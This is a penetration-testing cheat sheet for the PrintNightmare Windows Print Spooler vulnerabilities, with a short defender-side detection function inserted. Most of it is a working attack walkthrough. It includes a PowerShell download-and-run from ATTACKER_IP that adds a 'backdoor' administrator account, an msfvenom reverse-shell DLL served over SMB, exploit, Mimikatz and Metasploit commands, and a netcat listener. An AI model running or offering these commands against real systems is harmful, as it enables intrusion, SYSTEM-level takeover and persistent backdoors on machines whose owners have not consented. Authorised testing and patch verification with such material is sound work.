Overview

PrintNightmare exploits the Windows Print Spooler service to achieve LPE (Local Privilege Escalation) or RCE (Remote Code Execution) by loading a malicious DLL as SYSTEM.
CVE              Type   Impact
CVE-2021-1675    LPE    Local user → SYSTEM
CVE-2021-34527   RCE    Remote code execution as SYSTEM

Check if Vulnerable

Print Spooler running:
sc query spooler
Get-Service -Name Spooler
Missing patch:
wmic qfe | findstr "KB5003690 KB5003695 KB5003697"
If no results → vulnerable.
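A defender-side version of the checks above, wrapped in one function, added here and not part of the original page. It assumes Windows PowerShell 5.1 or later run with local administrator rights; the KB numbers are the ones listed above, and the Point and Print registry value (RestrictDriverInstallationToAdministrators) is Microsoft's documented hardening setting rather than something the page covers.

```powershell
# Added example: reports Print Spooler state, the page's KB list and the
# Point and Print hardening value as one object for triage or fleet scans.
function Test-PrintNightmareExposure {
    [CmdletBinding()]
    param(
        # KB numbers from the page; later cumulative updates supersede them.
        [string[]]$KnownFixes = @('KB5003690', 'KB5003695', 'KB5003697')
    )

    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $spoolerRunning = ($null -ne $spooler -and $spooler.Status -eq 'Running')

    # Get-HotFix lists only explicitly installed KBs, so "none found" is a
    # signal to investigate further, not proof that the host is unpatched.
    $installed = @(Get-HotFix -ErrorAction SilentlyContinue |
        Where-Object { $KnownFixes -contains $_.HotFixID } |
        Select-Object -ExpandProperty HotFixID)

    # Microsoft's Point and Print policy key (assumed present on hardened hosts).
    $pnpKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $pnp = Get-ItemProperty -Path $pnpKey -ErrorAction SilentlyContinue
    $restrictToAdmins = ($null -ne $pnp -and $pnp.RestrictDriverInstallationToAdministrators -eq 1)
    $noElevation      = ($null -ne $pnp -and $pnp.NoWarningNoElevationOnInstall -eq 1)

    # Heuristic: spooler up, driver installs not limited to admins, and either
    # none of the listed KBs present or elevation prompts disabled by policy.
    $needsAttention = $spoolerRunning -and (-not $restrictToAdmins) -and
                      (($installed.Count -eq 0) -or $noElevation)

    [PSCustomObject]@{
        ComputerName                   = $env:COMPUTERNAME
        SpoolerRunning                 = $spoolerRunning
        ListedKBsInstalled             = $installed
        DriverInstallRestrictedToAdmin = $restrictToAdmins
        NoWarningNoElevationOnInstall  = $noElevation
        NeedsAttention                 = $needsAttention
    }
}

Test-PrintNightmareExposure | Format-List
```

Hosts that do not need the spooler at all (domain controllers, most servers) are best handled by stopping and disabling the service rather than relying on the patch check alone.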

Local Privilege Escalation (LPE)

Using PowerShell (CVE-2021-1675)

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "backdoor" -NewPassword "P@ssw0rd123!" -DriverName "PrintIt"
The script confirms success by creating a local administrator account. Then:
net localgroup administrators
runas /user:backdoor cmd

GitHub

https://github.com/calebstewart/CVE-2021-1675

Remote Code Execution (RCE)

Step 1 — Create Malicious DLL

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

Step 2 — Host DLL on SMB Share

impacket-smbserver share . -smb2support

Step 3 — Exploit

# cube0x0's exploit (uses impacket)
python3 CVE-2021-1675.py DOMAIN/user:password@TARGET '\\ATTACKER_IP\share\evil.dll'

GitHub

https://github.com/cube0x0/CVE-2021-1675

Step 4 — Catch Shell

nc -lvnp 4444

Via Mimikatz

Remote:
misc::printnightmare /library:\\ATTACKER_IP\share\evil.dll /server:TARGET
Local:
misc::printnightmare /library:C:\Temp\evil.dll

Metasploit

use exploit/windows/dcerpc/CVE_2021_1675_printnightmare
set RHOSTS TARGET
set SMBUser user
set SMBPass password
set SRVHOST ATTACKER_IP
run

Post-Exploitation Cleanup

# Remove added driver
printui.exe /dl /n "PrintIt"
PrintNightmare can crash the Print Spooler service. In a real engagement, coordinate with the client before exploiting.